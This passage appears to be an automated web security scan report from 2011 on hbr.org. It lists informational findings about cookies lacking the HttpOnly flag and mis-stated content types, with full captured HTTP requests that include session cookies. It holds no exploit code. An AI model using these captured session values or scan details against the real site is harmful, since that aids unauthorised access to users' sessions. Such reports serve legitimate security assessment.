HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:41 GMT Server: Apache Last-Modified: Tue, 20 Apr 2010 14:15:17 GMT ETag: "9864b-cc1-484abb4f3e740" Accept-Ranges: bytes Content-Length: 3265 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:41 GMT LEG: 5 Content-Type: image/gif GIF89ad..........t..................~QNN...fff...333.....3........N.. .....,.....3..... ...................33P...f.ff......ff33...yX.f3f33.. ....3....3.3...f3.............3333......f...f.......3..6....[SNIP]...
4.43. http://hbr.org/products/13292-PDF-ENG/thumbnail/thumbnail.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/products/13292-PDF-ENG/thumbnail/thumbnail.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/13292-PDF-ENG/thumbnail/thumbnail.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:41 GMT Server: Apache Last-Modified: Fri, 23 Jul 2010 14:58:58 GMT ETag: "8f851-1070-48c0f46427080" Accept-Ranges: bytes Content-Length: 4208 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:41 GMT LEG: 5 Content-Type: image/gif GIF89ad.......eu.%F..1..;..&.........TTT.............:\.b}.Ll.....0...###rrr...................u..Us...............BBB:::.,Q.................(.........III.... 3.......Ee.y...A.......%K]]].x....)))...z...[SNIP]...
4.44. http://hbr.org/products/1915-PBK-ENG/thumbnail/thumbnail.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/products/1915-PBK-ENG/thumbnail/thumbnail.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products/1915-PBK-ENG/thumbnail/thumbnail.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:41 GMT Server: Apache Last-Modified: Tue, 30 Dec 2008 03:59:00 GMT ETag: "40bec-e8d-45f3b9c7d2900" Accept-Ranges: bytes Content-Length: 3725 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:41 GMT LEG: 5 Content-Type: image/gif GIF89ad.............h..V....fN#5GU.........w..Vepa..............o|.*q3....'5...K\g.....9...j.o...$6D..8bpy..(.............*$6..........K.R=....i......CS^......v.{....i'.R".......Q@.O..D..wJ..A.....d?...[SNIP]...
4.45. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /service/restv1/most-popular/daily/most_hbr/10/mostResphdlr?_=1320847772502 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:37 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 Content-Type: text/plain; charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:37 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 1466 mostResphdlr([{"pageUrl":"http://blogs.hbr.org/schwartz/2011/11/four-destructive-myths-most-co.html","pageTitle":"Four Destructive Myths Most Companies Still Live By - Tony Schwartz - Harvard Business...[SNIP]...
4.46. http://hbr.org/service/restv1/usersession/clickStream
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/service/restv1/usersession/clickStream
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT HWF_HISTORY=11|landing:2|; Version=1; Comment="Click Stream History"; Domain=hbr.org; Max-Age=2592000; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /service/restv1/usersession/clickStream?uri=http%3A%2F%2Fhbr.org%2Fproduct%2Fhow-venture-capitalists-evaluate-potential-venture%2Fan%2F805019-PDF-ENG%3FNtt%3DVenture%2BCapital%2Bprocess%26Nao%3D10&_=1320847772514 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:37 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5Set-Cookie: HWF_HISTORY=11|landing:2|; Version=1; Comment="Click Stream History"; Domain=hbr.org; Max-Age=2592000; Path=/ Content-Length: 0 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:37 GMT LEG: 5 Content-Type: text/plain; charset=UTF-8
4.47. http://hbr.org/service/restv1/usersession/displayChallenge
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/service/restv1/usersession/displayChallenge
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /service/restv1/usersession/displayChallenge?_=1320847774791 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:39 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 Content-Type: text/plain; charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:39 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 5 false
5. Content type incorrectly stated
previous
There are 2 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
5.1. http://hbr.org/hbrg-main/resources/images/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/favicon.ico
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=UTF-8 The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /hbrg-main/resources/images/favicon.ico HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:15 GMT ETag: "67ec0-57e-4a888798ac9c0" Accept-Ranges: bytes Content-Length: 1406 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT LEG: 5Content-Type: text/plain; charset=UTF-8 ..............h.......(....... ...............................q\......>!...................v......!........................................................................................................[SNIP]...
5.2. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://hbr.org
Path:
/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=UTF-8 The response states that it contains plain text . However, it actually appears to contain CSS .
Request
GET /service/restv1/most-popular/daily/most_hbr/10/mostResphdlr?_=1320847772502 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:37 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5Content-Type: text/plain; charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:37 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 1466 mostResphdlr([{"pageUrl":"http://blogs.hbr.org/schwartz/2011/11/four-destructive-myths-most-co.html","pageTitle":"Four Destructive Myths Most Companies Still Live By - Tony Schwartz - Harvard Business...[SNIP]...
Report generated by XSS.CX at Thu Nov 10 10:07:22 CST 2011.